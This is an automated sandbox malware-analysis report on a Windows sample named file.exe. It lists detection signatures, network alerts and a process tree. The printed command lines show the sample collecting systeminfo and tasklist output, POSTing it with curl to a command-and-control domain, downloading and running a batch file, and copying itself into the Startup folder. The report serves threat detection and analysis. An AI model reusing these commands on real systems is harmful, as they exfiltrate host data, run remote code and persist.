Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1573844
MD5:	5950611ed70f90b758610609e2aee8e6
SHA1:	798588341c108850c79da309be33495faf2f3246
SHA256:	5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Copy itself to suspicious location via type command

Suricata IDS alerts for network traffic

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops PE files to the startup folder

Found API chain indicative of sandbox detection

Gathers system information via systeminfo

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Writes or reads registry keys via WMI

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

file.exe (PID: 4848 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5950611ED70F90B758610609E2AEE8E6)

cmd.exe (PID: 4688 cmdline: cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 6360 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)

tasklist.exe (PID: 4308 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

curl.exe (PID: 2212 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 748 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3780 cmdline: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2780 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2668 cmdline: cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 6252 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

file.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 5950611ED70F90B758610609E2AEE8E6)

cmd.exe (PID: 4440 cmdline: cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 4308 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)

tasklist.exe (PID: 6540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

curl.exe (PID: 3836 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 3620 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1716 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7080 cmdline: cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5464 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Spreading

Sigma detected: Copy itself to suspicious location via type command

Source: Process started

Author: Joe Security: Data: Command: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , CommandLine: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4848, ParentProcessName: file.exe, ProcessCommandLine: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , ProcessId: 3780, ProcessName: cmd.exe

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , CommandLine: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\curl.exe, NewProcessName: C:\Windows\SysWOW64\curl.exe, OriginalFileName: C:\Windows\SysWOW64\curl.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4848, ParentProcessName: file.exe, ProcessCommandLine: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , ProcessId: 2212, ProcessName: curl.exe

Suricata Signatures

ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T16:46:14.864811+0100	2018886	1	A Network Trojan was detected	192.168.2.5	49720	94.154.172.218	443	TCP
2024-12-12T16:46:34.577073+0100	2018886	1	A Network Trojan was detected	192.168.2.5	49763	94.154.172.218	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49793 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D3A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0024DBBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0021C2A2 FindFirstFileExW,	0_2_0021C2A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002568EE FindFirstFileW,FindClose,	0_2_002568EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0025698F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0024D076
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00259642
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0025979D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00259B2B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00255C97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_005AD3A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_005ADBBE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_0057C2A2 FindFirstFileExW,	20_2_0057C2A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B68EE FindFirstFileW,FindClose,	20_2_005B68EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_005B698F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_005AD076
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_005B9642
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_005B979D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_005B9B2B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose,	20_2_005B5C97

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2018886 - Severity 1 - ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.5:49763 -> 94.154.172.218:443
Source: Network traffic	Suricata IDS: 2018886 - Severity 1 - ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.5:49720 -> 94.154.172.218:443

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: global traffic	HTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17852Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global traffic	HTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 1Content-Length: 0Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17774Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global traffic	HTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 1Content-Length: 0Content-Type: application/x-www-form-urlencoded

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0025CE44

Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global traffic	HTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: /X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
